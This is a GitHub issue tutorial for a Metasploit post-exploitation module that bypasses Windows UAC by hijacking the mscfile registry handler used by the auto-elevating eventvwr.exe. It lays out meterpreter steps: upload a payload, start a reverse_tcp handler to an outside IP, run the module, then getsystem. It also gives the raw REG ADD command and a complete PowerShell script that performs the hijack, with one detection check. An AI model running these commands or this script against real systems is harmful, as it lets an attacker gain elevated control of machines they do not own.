r00t-3xp10it / msf-auxiliarys

My collection of metasploit auxiliary post-modules

[ enigma_fileless_uac_bypass ] privilege_escalation #3

Open r00t-3xp10it opened 7 years ago

r00t-3xp10it commented 7 years ago

Achieve privilege escalation with enigma_fileless post-modules

enigma_fileless_uac_bypass -- metasploit post-exploitation module
enigma_fileless_IsolatedCommand -- metasploit post-exploitation module

Scenario:

This tutorial explains how EXEC_COMMAND can be used to achieve privilege escalation.

We have managed to exploit a Windows target, but when we try to escalate privileges
with the Metasploit core commands (getprivs and getsystem) the execution fails and
none of the three techniques available to getsystem works. That is expected from a
medium-integrity session: even when the logged-on user is a member of the local
Administrators group, UAC hands the session a filtered token, and the getsystem
techniques need privileges that token does not carry.

[screenshot: getsystem fail]




Prepare the lab for privilege escalation:

1 - get a meterpreter session open to the target system
     "it is a post-exploitation module, so it requires a session that is already open"

2 - upload your payload.exe to the target system
      meterpreter > upload /root/payload.exe %temp%\\payload.exe

3 - background the current session (ID 1)
     meterpreter > background

4 - start a new handler in the background for the uploaded payload
     msf exploit(handler) > handler -P 666 -H 192.168.1.69 -p windows/meterpreter/reverse_tcp

5 - load the enigma_fileless module
     msf exploit(handler) > use post/windows/escalate/enigma_fileless ...

Post-Module execution:

set SESSION 1
set EXEC_COMMAND start %temp%\\payload.exe
exploit

Hint: to use the target's PowerShell interpreter to execute the payload, set USE_POWERSHELL:

set SESSION 1
set USE_POWERSHELL true
set EXEC_COMMAND start %temp%\\payload.exe
exploit


Privilege escalation using metasploit (getsystem):

The second session opens as a high-integrity process (the payload is started by the
auto-elevated eventvwr.exe through the hijacked .msc file handler), so the Metasploit
commands getprivs and getsystem now succeed from it.

1 - Interact with the second session
      msf exploit(handler) > sessions -i 2

2 - elevate privileges now
      meterpreter > getprivs
      meterpreter > getsystem




Full command executed on the target machine (registry hijack of the .msc file handler):

cmd.exe /c REG ADD HKCU\Software\Classes\mscfile\shell\open\command /ve /t REG_SZ /d "C:\Windows\System32\cmd.exe /c start %temp%\\payload.exe" /f
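The registry hijack above, reproduced as a stand-alone PowerShell script so the whole mechanism (precondition checks, the registry write, the trigger and the cleanup) is visible outside the module. This is an added example, not the module's own code and not enigma0x3's original script; the function names, the payload path and the 10-second wait are assumptions. It must run in the medium-integrity context of a user who is in the local Administrators group, the same precondition the post-module has: eventvwr.exe auto-elevates and then resolves the mscfile handler under HKCU before HKCR, so the command written there runs at high integrity.

```powershell
# Added example: manual reproduction of the eventvwr.exe / mscfile registry hijack
# used by enigma_fileless_uac_bypass. Not the module's code; the function names,
# the payload path and the 10-second wait are assumptions for this example.
# Run from a medium-integrity PowerShell of a user in the local Administrators group.

$KeyRoot  = 'HKCU:\Software\Classes\mscfile'
$KeyPath  = 'HKCU:\Software\Classes\mscfile\shell\open\command'
$Payload  = Join-Path $env:TEMP 'payload.exe'                 # assumed: uploaded as in step 2
$EventVwr = Join-Path $env:SystemRoot 'System32\eventvwr.exe'

function Test-Elevated {
    # True only for a high-integrity (elevated) token. The filtered UAC token of an
    # Administrators-group user returns False here, which is why getsystem fails.
    $id = [Security.Principal.WindowsIdentity]::GetCurrent()
    $p  = New-Object Security.Principal.WindowsPrincipal($id)
    $p.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
}

function Test-AdminGroupMember {
    # The bypass needs a user who is in BUILTIN\Administrators (S-1-5-32-544), even though
    # the current token is filtered; whoami still lists the SID (as "deny only") in that case.
    [bool](whoami /groups | Select-String -SimpleMatch 'S-1-5-32-544')
}

function Test-UacAutoElevation {
    # Auto-elevation, and so this bypass, is off when UAC is disabled or set to
    # "Always notify" (ConsentPromptBehaviorAdmin = 2). Value 5 is the Windows default.
    $pol = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    ($pol.EnableLUA -eq 1) -and ($pol.ConsentPromptBehaviorAdmin -ne 2)
}

function Test-MscfileHijackPresent {
    # A per-user mscfile handler does not exist on a clean system, so its presence is an
    # indicator of this technique; the same check is useful from the defensive side.
    Test-Path $KeyPath
}

function Invoke-EventvwrHijack {
    param(
        [Parameter(Mandatory)][string]$Command,
        [int]$WaitSeconds = 10
    )

    if (Test-Elevated)                { throw 'Already elevated: nothing to bypass' }
    if (-not (Test-AdminGroupMember)) { throw 'User is not in local Administrators' }
    if (-not (Test-UacAutoElevation)) { throw 'UAC will not auto-elevate eventvwr.exe (Always notify, or UAC disabled)' }
    if (Test-MscfileHijackPresent)    { throw "$KeyPath already exists; refusing to overwrite it" }

    # Same write the module performs with: REG ADD <key> /ve /t REG_SZ /d "<command>" /f
    New-Item -Path $KeyPath -Force | Out-Null
    Set-ItemProperty -Path $KeyPath -Name '(default)' -Value $Command

    try {
        # eventvwr.exe auto-elevates and opens eventvwr.msc through the mscfile handler,
        # which is now our command, so the command runs at high integrity.
        Start-Process -FilePath $EventVwr
        Start-Sleep -Seconds $WaitSeconds
    }
    finally {
        # Always remove the hijack: leaving it behind is both an IOC and unintended persistence.
        Remove-Item -Path $KeyRoot -Recurse -Force -ErrorAction SilentlyContinue
    }
}

# Same command string the module writes, with %temp% already expanded by PowerShell.
Invoke-EventvwrHijack -Command "$env:SystemRoot\System32\cmd.exe /c start $Payload"
```

The `finally` block matters: the post-module's REG ADD leaves the key in place unless something deletes it, and a stray `HKCU\Software\Classes\mscfile` key is the first thing a responder will look for (Test-MscfileHijackPresent is the same check run from the other side). Microsoft changed the eventvwr.exe lookup in Windows 10 version 1703, so this path works on Windows 7 through Windows 10 builds before that.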




Video Tutorials:

Privilege escalation: https://www.youtube.com/watch?v=Ph7MajHbEVQ
Simple command execution: https://www.youtube.com/watch?v=upmNEJRf5Z8



Credits:

UAC bypass method credits: @enigma0x3 @Mattifestation @SubTee https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking

Special Thanks: @Chaitanya (SSA Team Member)